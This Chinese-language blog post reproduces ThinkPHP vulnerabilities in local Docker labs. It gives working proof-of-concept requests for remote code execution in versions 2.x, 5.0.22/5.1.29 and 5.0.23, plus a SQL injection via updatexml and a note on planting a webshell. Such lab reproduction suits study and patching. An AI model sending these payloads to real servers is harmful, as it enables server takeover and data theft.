thinkphp 框架漏洞复现
作者:互联网
ThinkPHP5 5.0.23 远程代码执行漏洞
漏洞搭建
docker-compose up -d
漏洞介绍
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
漏洞复现
-
poc
POST /index.php?s=captcha HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: settingStore=1630480512401_0 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 73 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
-
漏洞复习
-
写shell,利用pwd出来的路径写入shell
ThinkPHP 2.x 任意代码执行漏洞
漏洞介绍
ThinkPHP 2.x版本中,使用preg_replace
的/e
模式匹配路由:
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。
环境搭建
执行如下命令启动ThinkPHP 2.1的Demo应用:
docker-compose up -d
漏洞复现
- poc
http://127.0.0.1:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D
- 复现
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
漏洞复现
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
参考链接:
- http://www.thinkphp.cn/topic/60400.html
- http://www.thinkphp.cn/topic/60390.html
- https://xz.aliyun.com/t/3570
漏洞环境
运行ThinkPHP 5.0.20版本:
docker-compose up -d
漏洞复现
- poc
http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
- 复现
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
运行环境:
docker-compose up -d
漏洞原理
漏洞原理说明:
漏洞利用
- poc
127.0.0.1/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
- 复现
- 信息泄漏
标签:5.0,index,漏洞,代码执行,ThinkPHP,thinkphp,复现 来源: https://www.cnblogs.com/5rem/p/16181963.html